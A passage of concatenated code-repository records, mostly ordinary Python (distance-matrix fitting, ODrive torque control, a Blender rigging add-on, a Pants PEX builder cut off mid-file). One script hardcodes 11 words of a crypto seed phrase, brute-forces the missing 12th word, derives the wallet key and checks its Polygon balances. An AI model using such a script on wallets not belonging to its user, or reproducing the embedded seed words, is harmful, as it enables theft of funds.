distanceMatrix = n*n matrix with the distances between the points,\n diagonal elements must be zero,\n only lower triangle is required (upper triangle will be ignored).\n \n output: list with 2D-points: [[x1,y1],[x2,y2],...,[xn,yn]]\n \"\"\"\n distanceMatrix = list(list())\n \n def __init__(self, distanceMatrix):\n if self.checkDistanceMatrix(distanceMatrix):\n self.distanceMatrix = distanceMatrix\n \n def initPoints(self):\n \"\"\"First guess is on a straight line, spaces 1 apart\"\"\"\n points = list()\n for i in range(len(self.distanceMatrix)):\n x = i\n y = 0\n points.append([x,y])\n return points\n \n def checkDistanceMatrix(self, m):\n for i in range(len(m)):\n if m[i][i] != 0: #diagonal elements must be zero\n return False\n #loop over all elements under diagonal\n for j in range(len(m)):\n for k in range(j+1):\n if m[j][k] < 0:\n return False #lenghts must be greater than zero\n \n return True\n \n def distance(self, p1, p2):\n return math.sqrt((p2[0]-p1[0])**2+(p2[1]-p1[1])**2) #euclidian distance between 2 points in 2D\n \n def zeros(self, n):\n return [[0 for item in range(n)] for item in range(n) ]\n \n def createDistanceMatrix(self, points):\n m = self.zeros(len(points))\n for j in range(len(points)):\n for k in range(j+1):\n m[j][k] = self.distance(points[j], points[k])\n return m \n \n def score(self, points):\n \"\"\"Sum of squared errors between distances between points given and the distanceMatrix \"\"\"\n s = 0\n for j in range(len(points)):\n for k in range(j+1):\n s += (self.distance(points[j], points[k]) - self.distanceMatrix[j][k])**2\n return s\n \n def mutate(self, points):\n #select a random point to mutate\n p = random.randint(0, len(points)-1)\n #select a random angle in wich to mutate (in radians)\n a = random.random() * math.pi\n #select a random direction in wich to mutate\n d = random.choice([-1, 1])\n #select a random lenght to mutate\n l = random.choice(self.frange(0.1, 10, 0.1))\n \n #apply mutation\n points[p][0] += d*math.cos(a)*l\n points[p][1] += d*math.sin(a)*l\n \n return points\n \n def frange(self, start, stop, inc):\n l = list()\n i = start\n while i<=stop:\n l.append(i)\n i+=inc\n return l\n \n def points(self):\n numberOfRounds = 9999\n \n topFive = [self.initPoints()]\n \n for i in range(numberOfRounds):\n topFiveCopy = copy.deepcopy(topFive)\n for item in topFive:\n topFiveCopy.append(self.mutate(item))\n topFive = self.selectTopFive(topFiveCopy)\n \n return topFive[0]\n \n def selectTopFive(self, l):\n sortedl = sorted(l, key=self.score)\n return sortedl[0:5]\n\nif __name__ == \"__main__\":\n #testSimple()\n pass \n","repo_name":"ezegarra/microbrowser","sub_path":"setup/python/mds.py","file_name":"mds.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15658475854","text":"import time\nimport odrive as o\nfrom odrive.enums import *\n\n\ndef main():\n print(\"Finding an ODRIVE...\")\n m = o.find_any()\n m1 = m.axis1\n print(\"ODRIVE Connected...\")\n\n m1.controller.input_torque = 0.0\n m1.controller.config.control_mode = CONTROL_MODE_TORQUE_CONTROL\n m1.requested_state = AXIS_STATE_CLOSED_LOOP_CONTROL\n\n while True:\n t = float(input(\"Input Torque Value T, 0<=T<=1: \\n\"))\n if 0.0 <= t <= 1.0:\n break\n m1.controller.input_torque = t\n time.sleep(5)\n m1.controller.input_torque = 0.0\n\n\nmain()\n\n# Resources: https://github.com/but-i-love-pbj/odrive/blob/master/motor.py\n# Resources: https://python.hotexamples.com/examples/odrive/-/find_any/python-find_any-function-examples.html\n","repo_name":"EricYYang2022/RDS2022-Wand","sub_path":"1-DOF Prototype/ODRIVE/Motor Initial Setup/torque_command.py","file_name":"torque_command.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7835003416","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndebug = False\n\nimport requests\nfrom mnemonic import Mnemonic\nfrom bip32utils import BIP32Key\nfrom eth_keys import keys\nfrom eth_utils import to_checksum_address\n\n# Warunkowy import var_dump\nif debug:\n from var_dump import var_dump\n\n# Podziel mnemonic na dwie części, pamiętaj o spacji na końcu prefixu bądź początku sufixu\nprefix_mnemonic = \"liberty river current obey box soldier now gather dismiss penalty subway \"\nsuffix_mnemonic = \"\"\n\n# Lista 2048 słów BIP-39\nwordlist = Mnemonic(\"english\").wordlist\n\n# Stała dla kluczy utwardzonych\nHARDENED = 0x80000000\n\n# Klucz API dla polygonscan.com; get free one at https://polygonscan.com/myapikey\nAPI_KEY = \"\"\n\n# Znajdź brakujące słowo mnemonika\nfor word in wordlist:\n try:\n mnemonic = prefix_mnemonic + word + suffix_mnemonic\n if debug:\n var_dump(mnemonic)\n if Mnemonic(\"english\").check(mnemonic):\n print(f\"Znaleziono pasujące 12. słowo: {word}\")\n \n # Generuj klucz prywatny i adres Ethereum zgodnie z BIP-44\n seed = Mnemonic.to_seed(mnemonic)\n root_key = BIP32Key.fromEntropy(seed)\n child_key = root_key.ChildKey(44 + HARDENED).ChildKey(60 + HARDENED).ChildKey(0 + HARDENED).ChildKey(0).ChildKey(0)\n private_key_bytes = child_key.PrivateKey()\n private_key = keys.PrivateKey(private_key_bytes)\n address = to_checksum_address(private_key.public_key.to_address())\n\n print(f\"Adres Ethereum: {address}\")\n \n # Sprawdź stan konta na polygonscan.com\n response = requests.get(f\"https://api.polygonscan.com/api?module=account&action=balance&address={address}&tag=latest&apikey={API_KEY}\")\n balance = response.json().get(\"result\", \"0\")\n print(f\"Stan konta: {int(balance) / 10**18} MATIC\")\n \n # Sprawdź tokeny ERC-20\n response = requests.get(f\"https://api.polygonscan.com/api?module=account&action=tokentx&address={address}&startblock=0&endblock=99999999&sort=asc&apikey={API_KEY}\")\n erc20_tokens = response.json().get(\"result\", [])\n if erc20_tokens:\n print(\"Tokeny ERC-20:\")\n for token in erc20_tokens:\n print(f\"Token: {token['tokenName']}, Symbol: {token['tokenSymbol']}, Ilość: {int(token['value']) / 10**int(token['tokenDecimal'])}\")\n else:\n print(\"Brak tokenów ERC-20.\")\n \n # Sprawdź tokeny ERC-721\n response = requests.get(f\"https://api.polygonscan.com/api?module=account&action=tokennfttx&address={address}&startblock=0&endblock=99999999&sort=asc&apikey={API_KEY}\")\n erc721_tokens = response.json().get(\"result\", [])\n if erc721_tokens:\n print(\"Tokeny ERC-721:\")\n for token in erc721_tokens:\n print(f\"Token: {token['tokenName']}, Symbol: {token['tokenSymbol']}, Token ID: {token['tokenID']}\")\n else:\n print(\"Brak tokenów ERC-721.\")\n\n # Sprawdź tokeny ERC-1155\n response = requests.get(f\"https://api.polygonscan.com/api?module=account&action=token1155tx&address={address}&startblock=0&endblock=99999999&sort=asc&apikey={API_KEY}\")\n erc1155_tokens = response.json().get(\"result\", [])\n if erc1155_tokens:\n print(\"Tokeny ERC-1155:\")\n for token in erc1155_tokens:\n token_value = token.get('value', 'Nieznana ilość') # Używamy metody get() z wartością domyślną\n print(f\"Token: {token['tokenName']}, Symbol: {token['tokenSymbol']}, Token ID: {token['tokenID']}, Ilość: {token_value}\")\n else:\n print(\"Brak tokenów ERC-1155.\")\n except requests.RequestException as e:\n print(f\"Błąd podczas łączenia się z API: {e}\")\n except Exception as e:\n print(f\"Nieoczekiwany błąd: {e}\")\n","repo_name":"kolos666/crack12wordofrutilicus","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11542673452","text":"VERSION = (0, 0, 4)\n\nimport bpy\n\n## buttons for now are squatting on the \"chain links\" (constraints) icon tab\nPREFIX = \"constraint\"\n# other ideas: scene | object | physics | data | world | render | render_layers\n\n##############################################################################\n### FIXING DOTS IN OBJECT/MESH/ETC NAMES\n\ndef _dedotify(id, stuff):\n affected = []\n for _, m in enumerate(stuff):\n #console.warn(\"%s[%d]: %s\" % (str(id), _, str(m and m.name)));\n if m and \".\" in m.name:\n console.warn(\"%s[%d] fixing name: %s\" % (str(id), _, str(m.name)));\n m.name = m.name.replace(\".\",\"_\")\n affected.append(m)\n return affected\n \nclass FixDotsInNames(bpy.types.Operator):\n \"\"\" . -> _ \"\"\"\n bl_idname = PREFIX + \".fix_dots_in_names\"\n bl_label = \"Replaces dots with underscores\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n # note: certain things don't appear to be mutable unless OBJECT mode is selected\n bpy.ops.object.mode_set(mode='OBJECT')\n\n affected = []\n affected += _dedotify(\"objects\", bpy.data.objects)\n affected += _dedotify(\"meshes\", bpy.data.meshes)\n affected += _dedotify(\"materials\", bpy.data.materials)\n affected += _dedotify(\"textures\", bpy.data.textures)\n affected += _dedotify(\"armatures\", bpy.data.armatures)\n\n msg = YELL(affected, prefix=\"renamed\")\n\n if bpy.context.scene.fufbx_show_popup:\n # this pops up a little alert box near the mouse\n self.report({'ERROR'}, msg)\n else:\n # this displays in the menu bar area\n self.report({'INFO'}, \"{0}: {1:d} things affected\".format(\"._:\", len(affected)))\n\n return {'FINISHED'}\n\n##############################################################################\n## BONE REROLLING\n\ndef _selectBonesinEditMode(reg):\n \"\"\" pass an uncompiled regex-like string in to select those bones \"\"\"\n if bpy.context.mode != 'OBJECT':\n bpy.ops.object.mode_set(mode='OBJECT')\n bpy.ops.object.select_all(action='DESELECT')\n\n # select the first visible object with an armature\n obj = [o for o in bpy.context.visible_objects\n if isinstance(o.data, bpy.types.Armature)\n ][0]\n armature = obj.data\n console.info(\"armature: \"+str(armature))\n console.warn(\"object: \"+str(obj))\n\n # the active object determines the EDIT target\n bpy.context.scene.objects.active = obj\n\n # also needs to be \"selected\"\n obj.select = True\n \n bpy.ops.object.mode_set(mode='EDIT')\n\n assert(bpy.context.mode == 'EDIT_ARMATURE')\n\n if bpy.context.scene.fufbx_restore_selection:\n # having a bone selected is useful to see the color normal,\n # so attempt to restore selection after we're done\n previous = {\n 'head': [b for b in armature.edit_bones if b.select_head],\n 'tail': [b for b in armature.edit_bones if b.select_tail],\n 'bone': [b for b in armature.edit_bones if b.select],\n 'length': -1\n }\n previous['length'] = (\n len(previous['head']) +\n len(previous['tail']) +\n len(previous['bone'])\n )\n def restore():\n if previous and previous['length']:\n bpy.ops.armature.select_all(action='DESELECT')\n for b in previous['bone']:\n b.select = True\n for b in previous['head']:\n b.select_head = True\n for b in previous['tail']:\n b.select_tail = True\n restore_selection = restore\n else:\n restore_selection = False\n \n # clear any selected bones\n bpy.ops.armature.select_all(action='DESELECT')\n\n affected = []\n\n import re\n regex = re.compile(reg, re.IGNORECASE)\n\n # should this be limited to only deform bones??\n deforms = [b for b in armature.edit_bones if b.use_deform]\n for b in deforms:\n if regex.search(b.name):\n affected.append(b)\n b.select_head = True\n b.select = True\n b.select_tail = True\n return affected, restore_selection\n\n# make _selectBonesinEditMode reachable to debug from the Python Console\nsetattr(bpy.utils, '_selectBonesinEditMode', _selectBonesinEditMode)\n\ndef safe_calculate_roll(type='GLOBAL_NEG_Z'):\n try:\n bpy.ops.armature.calculate_roll(type=type)\n except:\n # earlier blender versions only have one 'Z' not GLOBAL_NEG/POS...\n bpy.ops.armature.calculate_roll(type=type[-1])\n \nclass ArmsAndHands(bpy.types.Operator):\n bl_label = \"Arms and Hands Roll -Z Global\"\n axis = bpy.props.StringProperty(default=\"GLOBAL_NEG_Z\")\n\n bl_idname = PREFIX + \".fix_arms_and_hands\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n affected, restore_selection = _selectBonesinEditMode( \"arm|hand|palm\" )\n\n if self.axis == 'ZERO':\n [ setattr(b,'roll',0) for b in affected ]\n else:\n safe_calculate_roll(type=self.axis)\n\n affected = [ u\"{1:+.1f}\\u00B0 {0}\".format(b.name, b.roll) for b in affected]\n msg = YELL(affected, prefix=self.axis)\n \n if bpy.context.scene.fufbx_show_popup:\n # digits are too much noise (do they even need to be rolled here?)\n import re\n msg2 = \"\\n\".join([\n m for m in msg.split(\"\\n\")\n if not re.search(r\"hand..\", m, re.IGNORECASE)\n ])\n if msg != msg2:\n msg2 += \"\\n(and fingers)\"\n # this pops up a little alert box near the mouse\n self.report({'ERROR'}, msg2)\n else:\n # this displays in the menu bar area\n self.report({'INFO'}, \"{0}: {1:d} bones affected\".format(self.axis, len(affected)))\n\n restore_selection and restore_selection()\n\n return {'FINISHED'}\n\nclass LegsAndCenterOfMass(bpy.types.Operator):\n bl_label = \"Legs and Center of Mass (Hips, Spine, Neck, Head) Roll -Y Global\"\n axis = bpy.props.StringProperty(default=\"GLOBAL_NEG_Y\")\n\n bl_idname = PREFIX + \".fix_legs_and_cmass\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n affected, restore_selection = _selectBonesinEditMode( \"leg|hips|spine|neck|head|face|thigh|shin\" )\n\n if self.axis == 'ZERO':\n [ setattr(b,'roll',0) for b in affected ]\n else:\n safe_calculate_roll(type=self.axis)\n\n affected = [ u\"{1:+.1f}\\u00B0 {0}\".format(b.name, b.roll) for b in affected]\n msg = YELL(affected, prefix=self.axis)\n\n if bpy.context.scene.fufbx_show_popup:\n # this pops up a little alert box near the mouse\n self.report({'ERROR'}, msg)\n else:\n # this displays in the menu bar area\n self.report({'INFO'}, \"{0}: {1:d} bones affected\".format(self.axis, len(affected)))\n\n restore_selection and restore_selection()\n\n return {'FINISHED'}\n\n##############################################################################\n## the actual new panel with the buttons for triggering stuff\n\nclass FUFBXPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the \"\"\"+PREFIX+\"\"\" context of the properties editor\"\"\"\n _version = \".\".join([str(x) for x in VERSION])\n bl_label = \"FUFBX (Functional User FBX) v\" + _version\n bl_idname = PREFIX.upper() + \"_PT_fufbx\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = PREFIX\n \n bpy.types.Scene.fufbx_show_popup = bpy.props.BoolProperty(name = \"show_popup\", default = True)\n bpy.types.Scene.fufbx_restore_selection = bpy.props.BoolProperty(name = \"restore_selection\", default = False)\n\n blender_version = bpy.app.version[0]+bpy.app.version[1]/100.0\n \n def __init__(self, *args, **kw):\n super(FUFBXPanel, self).__init__(*args, **kw)\n \n def draw(self, context):\n layout = self.layout\n if self.blender_version < 2.74:\n layout.label(text=\"!!! NOTE: this was designed for blender 2.74+ only\")\n\n layout.prop(bpy.context.scene, property='fufbx_show_popup', text=\"verbose mode\")\n layout.prop(bpy.context.scene, property='fufbx_restore_selection', text=\"restore bone selection\")\n\n layout.label(text=\"Hacks:\")\n\n split = layout.split()\n col = split.column()\n \n col.operator(PREFIX+\".fix_dots_in_names\")\n\n layout.label(text=\"Center of Mass:\")\n layout.operator(PREFIX+\".fix_legs_and_cmass\")\n split = layout.split()\n for _ in ['X','Y','Z']:\n col = split.column()\n col.operator(PREFIX+\".fix_legs_and_cmass\",text=\"-\"+_).axis = 'GLOBAL_NEG_'+_\n col = split.column()\n col.operator(PREFIX+\".fix_legs_and_cmass\",text=\"+\"+_).axis = 'GLOBAL_POS_'+_\n col = split.column()\n col.operator(PREFIX+\".fix_legs_and_cmass\",text=u\"0\\u00B0\").axis = 'ZERO'\n\n layout.label(text=\"Arms and Hands:\")\n layout.operator(PREFIX+\".fix_arms_and_hands\")\n split = layout.split()\n for _ in ['X','Y','Z']:\n col = split.column()\n col.operator(PREFIX+\".fix_arms_and_hands\",text=\"-\"+_).axis = 'GLOBAL_NEG_'+_\n col = split.column()\n col.operator(PREFIX+\".fix_arms_and_hands\",text=\"+\"+_).axis = 'GLOBAL_POS_'+_\n col = split.column()\n col.operator(PREFIX+\".fix_arms_and_hands\",text=u\"0\\u00B0\").axis = 'ZERO'\n\n\n##############################################################################\n## module stuff\n\ndef register():\n try:\n unregister()\n except:\n pass\n print(\"registering ui_panel\")\n bpy.utils.register_module(__name__)\n\ndef unregister():\n print(\"unregistering ui_panel\")\n bpy.utils.unregister_module(__name__)\n\n\n##############################################################################\n## console-lack hackery...\n\n## i'm experimenting with various ways to provide user feedback notices\n## (... blender has no great way of doing this, for years now)\n\ndef YELL(affected, **kw):\n prefix = kw.get(\"prefix\", \"affected\")\n empty = kw.get(\"empty\", \"(nothing affected)\")\n \n # this outputs above the main menu (to Blender's hidden log output pane!)\n [ console.info(str(x)) for x in affected ]\n\n if len(affected):\n msg = prefix + \":\\n \"+ (\"\\n \".join([str(x) for x in affected]))\n else:\n msg = empty\n\n return msg\n\nclass upper_console_output(bpy.types.Operator):\n bl_idname = 'render.upper_console_output'\n bl_label = 'WarnOutput'\n bl_options = {'REGISTER'}\n text = bpy.props.StringProperty()\n level = bpy.props.StringProperty(default=\"INFO\")\n def execute(self, context):\n self.report({self.level.upper()}, str(self.text))\n return {'FINISHED'}\n\ndef _logit(*args, **kw):\n level = kw.get('level', 'INFO');\n print(\"[\"+str(level)+\"]\" + str(args)) # also log to stdout\n try:\n bpy.ops.render.upper_console_output(text=str(args), level = level)\n except AttributeError:\n bpy.utils.register_class(upper_console_output)\n bpy.ops.render.upper_console_output(text=str(args), level = level)\n\nclass console:\n bl_options = set()\n @classmethod\n def debug(*args):\n _logit(*args, level='DEBUG')\n def info(*args):\n _logit(*args, level='INFO')\n def operator(*args):\n _logit(*args, level='OPERATOR')\n def warn(*args):\n _logit(*args, level='WARNING')\n def error(*args):\n _logit(*args, level='ERROR')\n\n## auto-register when ran a direct script in the text editor view\nif __name__ == \"__main__\":\n register()\n","repo_name":"humbletim/hifi-aux","sub_path":"examples/blender-fbx-ui-panel/fufbx_ui_panel.py","file_name":"fufbx_ui_panel.py","file_ext":"py","file_size_in_byte":11680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27762367489","text":"import json\nimport logging\nimport os\nfrom collections import defaultdict\nfrom pathlib import Path\nfrom typing import Callable, Dict, List, Optional, Sequence, Set, Tuple\n\nfrom pex.interpreter import PythonIdentity, PythonInterpreter\nfrom pex.pex_builder import PEXBuilder\nfrom pex.pex_info import PexInfo\nfrom pex.platforms import Platform\nfrom pex.resolver import resolve\nfrom pex.util import DistributionHelper\nfrom pex.version import __version__ as pex_version\nfrom pkg_resources import Distribution, get_provider\n\nfrom pants.backend.python.subsystems.ipex import ipex_launcher\nfrom pants.backend.python.targets.python_binary import PythonBinary\nfrom pants.backend.python.targets.python_distribution import PythonDistribution\nfrom pants.backend.python.targets.python_library import PythonLibrary\nfrom pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary\nfrom pants.backend.python.targets.python_tests import PythonTests\nfrom pants.base.build_environment import get_buildroot\nfrom pants.base.exceptions import TaskError\nfrom pants.build_graph.files import Files\nfrom pants.build_graph.target import Target\nfrom pants.option.custom_types import UnsetBool\nfrom pants.python.python_repos import PythonRepos\nfrom pants.python.python_requirement import PythonRequirement\nfrom pants.python.python_setup import PythonSetup\nfrom pants.subsystem.subsystem import Subsystem\nfrom pants.util.collections import assert_single_element\nfrom pants.util.contextutil import temporary_file\nfrom pants.util.ordered_set import OrderedSet\nfrom pants.util.strutil import module_dirname\n\n\ndef is_python_target(tgt: Target) -> bool:\n # We'd like to take all PythonTarget subclasses, but currently PythonThriftLibrary and\n # PythonAntlrLibrary extend PythonTarget, and until we fix that (which we can't do until\n # we remove the old python pipeline entirely) we want to ignore those target types here.\n return isinstance(tgt, (PythonLibrary, PythonTests, PythonBinary))\n\n\ndef has_python_sources(tgt: Target) -> bool:\n return is_python_target(tgt) and tgt.has_sources()\n\n\ndef is_local_python_dist(tgt: Target) -> bool:\n return isinstance(tgt, PythonDistribution)\n\n\ndef has_resources(tgt: Target) -> bool:\n return isinstance(tgt, Files) and tgt.has_sources()\n\n\ndef has_python_requirements(tgt: Target) -> bool:\n return isinstance(tgt, PythonRequirementLibrary)\n\n\ndef always_uses_default_python_platform(tgt: Target) -> bool:\n return isinstance(tgt, PythonTests)\n\n\ndef may_have_explicit_python_platform(tgt: Target) -> bool:\n return isinstance(tgt, PythonBinary)\n\n\ndef targets_by_platform(targets, python_setup):\n targets_requiring_default_platforms = []\n explicit_platform_settings = defaultdict(OrderedSet)\n for target in targets:\n if always_uses_default_python_platform(target):\n targets_requiring_default_platforms.append(target)\n elif may_have_explicit_python_platform(target):\n for platform in target.platforms if target.platforms else python_setup.platforms:\n explicit_platform_settings[platform].add(target)\n # There are currently no tests for this because they're super platform specific and it's hard for\n # us to express that on CI, but https://github.com/pantsbuild/pants/issues/7616 has an excellent\n # repro case for why this is necessary.\n for target in targets_requiring_default_platforms:\n for platform in python_setup.platforms:\n explicit_platform_settings[platform].add(target)\n return dict(explicit_platform_settings)\n\n\ndef identify_missing_init_files(sources: Sequence[str]) -> Set[str]:\n \"\"\"Return the list of paths that would need to be added to ensure that every package has an\n __init__.py.\"\"\"\n packages: Set[str] = set()\n for source in sources:\n if source.endswith(\".py\"):\n pkg_dir = os.path.dirname(source)\n if pkg_dir and pkg_dir not in packages:\n package = \"\"\n for component in pkg_dir.split(os.sep):\n package = os.path.join(package, component)\n packages.add(package)\n\n return {os.path.join(package, \"__init__.py\") for package in packages} - set(sources)\n\n\nclass PexBuilderWrapper:\n \"\"\"Wraps PEXBuilder to provide an API that consumes targets and other BUILD file entities.\"\"\"\n\n class Factory(Subsystem):\n options_scope = \"pex-builder-wrapper\"\n\n @classmethod\n def register_options(cls, register):\n super(PexBuilderWrapper.Factory, cls).register_options(register)\n # TODO: make an analogy to cls.register_jvm_tool that can be overridden for python subsystems\n # by a python_requirement_library() target, not just via pants.ini!\n register(\n \"--setuptools-version\",\n advanced=True,\n default=\"40.6.3\",\n fingerprint=True,\n help=\"The setuptools version to include in the pex if namespace packages need \"\n \"to be injected.\",\n )\n register(\n \"--pex-version\",\n advanced=True,\n default=pex_version,\n fingerprint=True,\n help=\"The pex version to include in any generated ipex files. \"\n \"NOTE: This should ideally be the same as the pex version which pants \"\n f\"itself depends on, which right now is {pex_version}.\",\n )\n\n @classmethod\n def subsystem_dependencies(cls):\n return super(PexBuilderWrapper.Factory, cls).subsystem_dependencies() + (\n PythonRepos,\n PythonSetup,\n )\n\n @classmethod\n def create(cls, builder, log=None, generate_ipex=False):\n options = cls.global_instance().get_options()\n setuptools_requirement = f\"setuptools=={options.setuptools_version}\"\n pex_requirement = f\"pex=={options.pex_version}\"\n\n log = log or logging.getLogger(__name__)\n\n return PexBuilderWrapper(\n builder=builder,\n python_repos_subsystem=PythonRepos.global_instance(),\n python_setup_subsystem=PythonSetup.global_instance(),\n setuptools_requirement=PythonRequirement(setuptools_requirement),\n pex_requirement=PythonRequirement(pex_requirement),\n log=log,\n generate_ipex=generate_ipex,\n )\n\n def __init__(\n self,\n builder: PEXBuilder,\n python_repos_subsystem: PythonRepos,\n python_setup_subsystem: PythonSetup,\n setuptools_requirement: PythonRequirement,\n pex_requirement: PythonRequirement,\n log,\n generate_ipex: bool = False,\n ):\n assert log is not None\n\n self._builder = builder\n self._python_repos_subsystem = python_repos_subsystem\n self._python_setup_subsystem = python_setup_subsystem\n self._setuptools_requirement = setuptools_requirement\n self._pex_requirement = pex_requirement\n self._log = log\n\n self._distributions: Dict[str, Distribution] = {}\n self._frozen = False\n\n self._generate_ipex = generate_ipex\n # If we generate a .ipex, we need to ensure all the code we copy into the underlying PEXBuilder\n # is also added to the new PEXBuilder created in `._shuffle_original_build_info_into_ipex()`.\n self._all_added_sources_resources: List[Path] = []\n # If we generate a dehydrated \"ipex\" file, we need to make sure that it is aware of any special\n # find_links repos attached to any single requirement, so it can later resolve those\n # requirements when it is first bootstrapped, using the same resolve options.\n self._all_find_links: OrderedSet[str] = OrderedSet()\n\n def add_requirement_libs_from(self, req_libs, platforms=None):\n \"\"\"Multi-platform dependency resolution for PEX files.\n\n :param builder: Dump the requirements into this builder.\n :param interpreter: The :class:`PythonInterpreter` to resolve requirements for.\n :param req_libs: A list of :class:`PythonRequirementLibrary` targets to resolve.\n :param log: Use this logger.\n :param platforms: A list of :class:`Platform`s to resolve requirements for.\n Defaults to the platforms specified by PythonSetup.\n \"\"\"\n reqs = [req for req_lib in req_libs for req in req_lib.requirements]\n self.add_resolved_requirements(reqs, platforms=platforms)\n\n class SingleDistExtractionError(Exception):\n pass\n\n def extract_single_dist_for_current_platform(self, reqs, dist_key) -> Distribution:\n \"\"\"Resolve a specific distribution from a set of requirements matching the current platform.\n\n :param list reqs: A list of :class:`PythonRequirement` to resolve.\n :param str dist_key: The value of `distribution.key` to match for a `distribution` from the\n resolved requirements.\n :return: The single :class:`pkg_resources.Distribution` matching `dist_key`.\n :raises: :class:`self.SingleDistExtractionError` if no dists or multiple dists matched the\n given `dist_key`.\n \"\"\"\n distributions = self.resolve_distributions(reqs, platforms=[\"current\"])\n try:\n matched_dist = assert_single_element(\n dist for dists in distributions.values() for dist in dists if dist.key == dist_key\n )\n except (StopIteration, ValueError) as e:\n raise self.SingleDistExtractionError(\n f\"Exactly one dist was expected to match name {dist_key} in requirements {reqs}: {e!r}\"\n )\n return matched_dist\n\n def resolve_distributions(\n self, reqs: List[PythonRequirement], platforms: Optional[List[Platform]] = None,\n ) -> Dict[str, List[Distribution]]:\n \"\"\"Multi-platform dependency resolution.\n\n :param reqs: A list of :class:`PythonRequirement` to resolve.\n :param platforms: A list of platform strings to resolve requirements for.\n Defaults to the platforms specified by PythonSetup.\n :returns: A tuple `(map, transitive_reqs)`, where `map` is a dict mapping distribution name\n to a list of resolved distributions, and `reqs` contains all transitive ==\n requirements\n needed to resolve the initial given requirements `reqs` for the given platforms.\n \"\"\"\n deduped_reqs = OrderedSet(reqs)\n find_links: OrderedSet[str] = OrderedSet()\n for req in deduped_reqs:\n self._log.debug(f\" Dumping requirement: {req}\")\n self._builder.add_requirement(str(req.requirement))\n if req.repository:\n find_links.add(req.repository)\n\n # Resolve the requirements into distributions.\n distributions = self._resolve_multi(\n self._builder.interpreter, list(deduped_reqs), platforms, list(find_links),\n )\n return distributions\n\n def add_resolved_requirements(\n self,\n reqs: List[PythonRequirement],\n platforms: Optional[List[Platform]] = None,\n override_ipex_build_do_actually_add_distribution: bool = False,\n ) -> None:\n \"\"\"Multi-platform dependency resolution for PEX files.\n\n :param builder: Dump the requirements into this builder.\n :param interpreter: The :class:`PythonInterpreter` to resolve requirements for.\n :param reqs: A list of :class:`PythonRequirement` to resolve.\n :param log: Use this logger.\n :param platforms: A list of :class:`Platform`s to resolve requirements for.\n Defaults to the platforms specified by PythonSetup.\n :param bool override_ipex_build_do_actually_add_distribution: When this PexBuilderWrapper is configured with\n generate_ipex=True, this method won't add any distributions to\n the output pex. The internal implementation of this class adds a\n pex dependency to the output ipex file, and therefore needs to\n override the default behavior of this method.\n \"\"\"\n distributions = self.resolve_distributions(reqs, platforms=platforms)\n locations: Set[str] = set()\n for platform, dists in distributions.items():\n for dist in dists:\n if dist.location not in locations:\n if self._generate_ipex and not override_ipex_build_do_actually_add_distribution:\n self._log.debug(\n f\" *AVOIDING* dumping distribution into ipex: .../{os.path.basename(dist.location)}\"\n )\n self._register_distribution(dist)\n else:\n self._log.debug(\n f\" Dumping distribution: .../{os.path.basename(dist.location)}\"\n )\n self.add_distribution(dist)\n locations.add(dist.location)\n\n def _resolve_multi(\n self,\n interpreter: PythonInterpreter,\n requirements: List[PythonRequirement],\n platforms: Optional[List[Platform]],\n find_links: Optional[List[str]],\n ) -> Dict[str, List[Distribution]]:\n \"\"\"Multi-platform dependency resolution for PEX files.\n\n Returns a tuple containing a list of distributions that must be included in order to satisfy a\n set of requirements, and the transitive == requirements for those distributions. This may\n involve distributions for multiple platforms.\n\n :param interpreter: The :class:`PythonInterpreter` to resolve for.\n :param requirements: A list of :class:`PythonRequirement` objects to resolve.\n :param platforms: A list of :class:`Platform`s to resolve for.\n :param find_links: Additional paths to search for source packages during resolution.\n :return: Map of platform name -> list of :class:`pkg_resources.Distribution` instances needed\n to satisfy the requirements on that platform.\n \"\"\"\n python_setup = self._python_setup_subsystem\n python_repos = self._python_repos_subsystem\n platforms = platforms or python_setup.platforms\n\n find_links = list(find_links) if find_links else []\n find_links.extend(python_repos.repos)\n\n # Individual requirements from pants may have a `repository` link attached to them, which is\n # extracted in `self.resolve_distributions()`. When generating a .ipex file with\n # `generate_ipex=True`, we want to ensure these repos are known to the ipex launcher when it\n # tries to resolve all the requirements from BOOTSTRAP-PEX-INFO.\n self._all_find_links.update(OrderedSet(find_links))\n\n distributions: Dict[str, List[Distribution]] = defaultdict(list)\n\n for platform in platforms:\n requirements_cache_dir = os.path.join(\n python_setup.resolver_cache_dir, str(interpreter.identity)\n )\n resolved_dists = resolve(\n requirements=[str(req.requirement) for req in requirements],\n interpreter=interpreter,\n platform=platform,\n indexes=python_repos.indexes,\n find_links=find_links,\n cache=requirements_cache_dir,\n allow_prereleases=python_setup.resolver_allow_prereleases,\n manylinux=python_setup.manylinux,\n )\n for resolved_dist in resolved_dists:\n distributions[platform].append(resolved_dist.distribution)\n\n return distributions\n\n def _create_source_dumper(self, tgt: Target) -> Callable[[str], None]:\n buildroot = get_buildroot()\n\n def get_chroot_path(relpath: str) -> str:\n if type(tgt) == Files:\n # Loose `Files`, as opposed to `Resources` or `PythonTarget`s, have no (implied) package\n # structure and so we chroot them relative to the build root so that they can be accessed\n # via the normal Python filesystem APIs just as they would be accessed outside the\n # chrooted environment. NB: This requires we mark the pex as not zip safe so\n # these `Files` can still be accessed in the context of a built pex distribution.\n self._builder.info.zip_safe = False\n return relpath\n return str(Path(relpath).relative_to(tgt.target_base))\n\n def dump_source(relpath: str) -> None:\n source_path = str(Path(buildroot, relpath))\n dest_path = get_chroot_path(relpath)\n\n self._all_added_sources_resources.append(Path(dest_path))\n if has_resources(tgt):\n self._builder.add_resource(filename=source_path, env_filename=dest_path)\n else:\n self._builder.add_source(filename=source_path, env_filename=dest_path)\n\n return dump_source\n\n def add_sources_from(self, tgt: 